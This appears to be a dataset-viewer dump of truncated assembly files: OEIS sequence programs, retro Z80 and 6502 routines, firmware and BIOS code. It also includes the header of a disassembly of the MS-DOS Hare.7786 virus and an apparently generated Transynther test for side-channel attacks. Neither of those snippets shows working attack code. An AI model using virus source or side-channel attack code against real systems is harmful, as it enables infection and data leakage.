;
.in_Inkey
._in_Inkey
ld a,@111
out (3),a
ld de,0... |
programs/oeis/021/A021740.asm | neoneye/loda | 22 | 43770 | <filename>programs/oeis/021/A021740.asm<gh_stars>10-100
; A021740: Decimal expansion of 1/736.
; 0,0,1,3,5,8,6,9,5,6,5,2,1,7,3,9,1,3,0,4,3,4,7,8,2,6,0,8,6,9,5,6,5,2,1,7,3,9,1,3,0,4,3,4,7,8,2,6,0,8,6,9,5,6,5,2,1,7,3,9,1,3,0,4,3,4,7,8,2,6,0,8,6,9,5,6,5,2,1,7,3,9,1,3,0,4,3,4,7,8,2,6,0,8,6,9,5,6,5
add $0,1
mov $1,10
pow $... |
oeis/114/A114765.asm | neoneye/loda-programs | 11 | 43771 | ; A114765: a(n) = floor(sqrt(7) * 10^n)^2.
; Submitted by <NAME>
; 4,676,69696,6996025,699972849,69999930625,6999998354001,699999994145169,69999999943667161,6999999999658218721,699999999965821872100,69999999999757088783236,6999999999996874888812096,699999999999952064012316025,69999999999999968753591518681,6999999999999... |
MdeModulePkg/Universal/CapsulePei/X64/PageFaultHandler.asm | sscargal/ipmctl | 151 | 43772 | <gh_stars>100-1000
;; @file
; This is the assembly code for page fault handler hook.
;
; Copyright (c) 2015, Intel Corporation. All rights reserved.<BR>
;
; This program and the accompanying materials
; are licensed and made available under the terms and conditions of the BSD License
; which accompanies this distribu... |
oeis/028/A028188.asm | neoneye/loda-programs | 11 | 43773 | ; A028188: Expansion of 1/((1-5*x)*(1-7*x)*(1-10*x)*(1-12*x)).
; Submitted by <NAME>
; 1,34,737,13022,204885,2995842,41695033,560476774,7346285309,94497418730,1198353224289,15030879260046,186924790959973,2308975949692498,28368854500004105,347054225208330038
mov $1,1
mov $2,$0
mov $3,$0
lpb $2
mov $0,$3
trn $2,1
... |
oeis/303/A303987.asm | neoneye/loda-programs | 11 | 43775 | <reponame>neoneye/loda-programs
; A303987: Triangle read by rows: T(n, k) = (binomial(n,k)*binomial(n+k,k))^2 = A063007(n, k)^2, for n >= 0, k = 0..n.
; Submitted by <NAME>
; 1,1,4,1,36,36,1,144,900,400,1,400,8100,19600,4900,1,900,44100,313600,396900,63504,1,1764,176400,2822400,9922500,7683984,853776,1,3136,571536,176... |
oeis/084/A084941.asm | neoneye/loda-programs | 11 | 43776 | ; A084941: Octagorials: n-th polygorial for k=8.
; Submitted by <NAME>(s1)
; 1,1,8,168,6720,436800,41932800,5577062400,981562982400,220851671040000,61838467891200000,21086917550899200000,8603462360766873600000,4138265395528866201600000,2317428621496165072896000000
mov $1,1
mov $2,1
lpb $0
mul $1,$0
sub $0,1
mul ... |
projects/vmt/test/FunctionCalls/NestedCall/NestedCall.asm | RobertCurry0216/nand2tetris | 0 | 43777 | <reponame>RobertCurry0216/nand2tetris
// function Sys.init 0
(Sys.init)
@SP
D=M
@LCL
AM=D
D=A
@SP
M=D
// push constant 4000
@4000
D=A
@SP
A=M
M=D
@SP
M=M+1
// pop pointer 0
@THIS
D=A
@0
D=D+A
@R15
M=D
@SP
AM=M-1
D=M
@R15
A=M
M=D
// push constant 5000
@5000
D=A
@SP
A=M
M=D
@SP
M=M+1
// pop pointer 1
@THIS
D=A
@1
D=D+A
... |
oeis/142/A142152.asm | neoneye/loda-programs | 11 | 43778 | ; A142152: Primes congruent to 21 mod 38.
; Submitted by <NAME>
; 59,97,173,211,401,439,743,857,971,1009,1123,1237,1427,1579,1693,1997,2111,2339,2377,2719,2833,2909,3023,3061,3137,3251,3517,3593,3631,3821,4049,4201,4391,4657,4733,4999,5113,5189,5227,5303,5417,5531,5569,5683,5987,6101,6329,6367,6481,6709,6823,6899,7013,... |
engine/phone/phone.asm | genterz/pokecross | 28 | 43779 | <gh_stars>10-100
AddPhoneNumber::
call _CheckCellNum
jr c, .cant_add
call Phone_FindOpenSlot
jr nc, .cant_add
ld [hl], c
xor a
ret
.cant_add
scf
ret
DelCellNum::
call _CheckCellNum
jr nc, .not_in_list
xor a
ld [hl], a
ret
.not_in_list
scf
ret
CheckCellNum::
jp _CheckCellNum ; wtf
_CheckCellNum:
l... |
base/runtime/round.asm | zbyti/Mad-Pascal | 7 | 43780 |
/*
@ROUND
@ROUND_SHORT
*/
.proc @ROUND
ldy :STACKORIGIN+STACKWIDTH*3,x
spl
jsr negCARD
lda :STACKORIGIN,x
// add #$80
cmp #$80
lda :STACKORIGIN+STACKWIDTH,x
adc #0
sta :STACKORIGIN,x
lda :STACKORIGIN+STACKWIDTH*2,x
adc #0
sta :STACKORIGIN+STACKWIDTH,x
lda :STACKORIGIN+STACKWIDTH*3... |
basic/src/evaluate/unary.asm | paulscottrobson/eris | 13 | 43781 | ; *****************************************************************************
; *****************************************************************************
;
; Name: unary.asm
; Purpose: Basic unary functions
; Created: 4th March 2020
; Reviewed: 17th March 2020
; Author: <NAME> (<EMAIL>)
;
; **************... |
programs/oeis/267/A267182.asm | karttu/loda | 0 | 43782 | <filename>programs/oeis/267/A267182.asm
; A267182: Row 2 of the square array in A267181.
; 1,2,0,3,1,4,2,5,3,6,4,7,5,8,6,9,7,10,8,11,9,12,10,13,11,14,12,15,13,16,14,17,15,18,16,19,17,20,18,21,19,22,20,23,21,24,22,25,23,26,24,27,25,28,26,29,27,30,28,31,29,32,30,33,31,34,32,35,33,36,34,37,35,38,36,39,37,40,38,41,39
lpb ... |
s2/sfx-original/B9 - Smash.asm | Cancer52/flamedriver | 9 | 43783 | Sound39_Smash_Header:
smpsHeaderStartSong 2
smpsHeaderVoice Sound2C_39_4B_Voices
smpsHeaderTempoSFX $01
smpsHeaderChanSFX $04
smpsHeaderSFXChannel cFM3, Sound39_Smash_FM3, $10, $00
smpsHeaderSFXChannel cFM4, Sound39_Smash_FM4, $00, $00
smpsHeaderSFXChannel cFM5, Sound39_Smash_FM5, $10, $00
smpsHeaderSFX... |
FixedPoint/_Bit_Scan_32.asm | Nicholas10128/FixedPoint | 0 | 43784 | <reponame>Nicholas10128/FixedPoint
.code
_bsf_32 proc
bsf eax, ecx
ret
ret;
_bsf_32 endp
_bsr_32 proc
bsr eax, ecx
ret
ret;
_bsr_32 endp
END |
MSDOS/Virus.MSDOS.Unknown.hare.asm | fengjixuchui/Family | 3 | 43785 | ;============================================================================
;
; HDEuthanasia-v3 by <NAME>.
;
; Disassembly of the Hare.7786 virus.
;
; Source: 103k
;
; Disassembly was done by T-2000 / Invaders.
;
; April 1998 / May 1998.
;
; Very stupid written! MUCH double, triple code, unstructured programming,
; d... |
libsrc/z88/di.asm | andydansby/z88dk-mk2 | 1 | 43786 | <filename>libsrc/z88/di.asm
;
; Small C+ Runtime Library
;
; Z88 Application functions
;
; *** Z88 SPECIFIC FUNCTION - probably no equiv for your machine! ***
;
; 11/4/99
;
; Disable interruptes
; int di(void)
XLIB di
INCLUDE "interrpt.def"
.di
... |
oeis/080/A080757.asm | neoneye/loda-programs | 11 | 43787 | <reponame>neoneye/loda-programs
; A080757: First differences of Beatty sequence A022838(n) = floor(n sqrt(3)).
; Submitted by <NAME>(s4)
; 1,2,2,1,2,2,2,1,2,2,2,1,2,2,1,2,2,2,1,2,2,2,1,2,2,2,1,2,2,1,2,2,2,1,2,2,2,1,2,2,2,1,2,2,1,2,2,2,1,2,2,2,1,2,2,1,2,2,2,1,2,2,2,1,2,2,2,1,2,2,1,2,2,2,1,2,2,2,1,2,2,2,1,2,2,1,2,2,2,1,2... |
header/034/NINA-001.asm | freem/nes_corelib | 16 | 43788 | ; NINA-001: 64KB PRG-ROM + 8KB PRG-RAM + 32KB CHR-ROM
; http://bootgod.dyndns.org:7777/search.php?unif=AVE-NINA-01
;------------------------------------------------------------------------------;
; BNROM mirroring is hardwired via solder pads.
; %0000 = Horizontal
; %0001 = Vertical
MIRRORING = %0001
; Mapper 034.1 (N... |
demos/disass.asm | 42Bastian/new_bll | 4 | 43789 | <reponame>42Bastian/new_bll<filename>demos/disass.asm
;DISASS 65SC02-DISASSMEBLER
;
; created : 200792-
;
;
IMPL EQU 0
IMM EQU 1
REL EQU 2
ZERO EQU 3
ZEROX EQU 4
ZEROY EQU 5
ABS EQU 6
ABSX EQU 7
ABSY EQU 8
ABSIND EQU 9
IND EQU 10
INDX EQU 11
POINTER EQU $40 ; Zeiger auf MC
MNE_PTR EQU $42 ; Zeiger auf Mnemoniks
DI... |
asm/main.asm | mlugg/tqc | 4 | 43790 | %include "runtime.inc"
section .data
digits: db '0123456789'
intobj:
dw 0
dw OBJ_TYPE_DATA
dd 1
.intval: dq 0
section .bss
strbuf: resb 32
section .text
extern obj_main
global _start
_start:
; check argc == 2
cmp qword [rsp], 2
jne .err
; get second arg
mov rsi, [rsp + 16]
; parse as number
xor rax... |
libsrc/_DEVELOPMENT/string/c/sccz80/strnlen_callee.asm | jpoikela/z88dk | 0 | 43791 | <filename>libsrc/_DEVELOPMENT/string/c/sccz80/strnlen_callee.asm
; size_t strnlen(const char *s, size_t maxlen)
SECTION code_clib
SECTION code_string
PUBLIC strnlen_callee
EXTERN asm_strnlen
strnlen_callee:
pop hl
pop bc
ex (sp),hl
jp asm_strnlen
; SDCC bridge for Classic
IF __CLASSIC
PUBLIC _str... |
programs/oeis/140/A140684.asm | jmorken/loda | 1 | 43792 | <reponame>jmorken/loda
; A140684: A037481 mod 10.
; 0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2,9,8,3,4,7,0,1,6,5,2
mov $3,$0
add $0,1
gcd $3,2
mov $4,-7
div $4,$3
mul $0,$4... |
Working Disassembly/Levels/SOZ/Misc Object Data/Map - Collapsing Bridge.asm | TeamASM-Blur/Sonic-3-Blue-Balls-Edition | 5 | 43793 | dc.w word_21280-Map_SOZCollapsingBridge
dc.w word_212A0-Map_SOZCollapsingBridge
dc.w word_212DE-Map_SOZCollapsingBridge
word_21280: dc.w 5 ; DATA XREF: ROM:0002127Ao
dc.b $F0, $D, $10, 8, $FF, $E0
dc.b $F0, $D, $10, $10, 0, 0
dc.b 0, $D, $10, 0, $FF, $E0
dc.b $10, $D, $10, 0, $FF, $E0
... |
programs/oeis/321/A321124.asm | neoneye/loda | 22 | 43795 | <reponame>neoneye/loda<filename>programs/oeis/321/A321124.asm<gh_stars>10-100
; A321124: a(n) = (4*n^3 - 6*n^2 + 14*n + 3)/3.
; 1,5,13,33,73,141,245,393,593,853,1181,1585,2073,2653,3333,4121,5025,6053,7213,8513,9961,11565,13333,15273,17393,19701,22205,24913,27833,30973,34341,37945,41793,45893,50253,54881,59785,64973,7... |
TVSW/Model Verification/Cart.asm | samuelexferri/unibg-workspace | 0 | 43796 | <gh_stars>0
asm Cart
import ./STDL/StandardLibrary
signature:
// DOMAINS
abstract domain Drug
enum domain States = {WAITING | ADD_PRODUCT_OR_EXIT | CHOOSE_GEN_COM | SELECTED_GENERIC | SELECTED_COMMERCIAL | CLOSED}
enum domain Actions = {ORDER | EXIT}
enum domain AddProduct = {YES | NO}
enum domain Type = {GENER... |
src/cbios.asm | codebje/trs20-bootrom | 0 | 43797 |
BIOS equ $F600 ; BIOS loads here
CCP equ BIOS - $1600 ; $E000 - CCP entry point
BDOS equ BIOS - $0E00 ; $E800 - BDOS entry point
FBASE equ BDOS + 6
IOBYTE equ $0003 ; IO control byte location
USERDRV equ $0004 ; Current drive control byte
ROMDISK equ $2000 ; ROM disk location (plus $80000)
OS_IMAGE eq... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca.log_121_1454.asm | ljhsiun2/medusa | 9 | 43798 | <filename>Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca.log_121_1454.asm
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r14
push %r15
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0xca62, %r15
nop
nop
nop
nop
xor %rdi, %rdi
mov $0x6162636465666768, %r11
movq %r11, (%r15)
nop... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.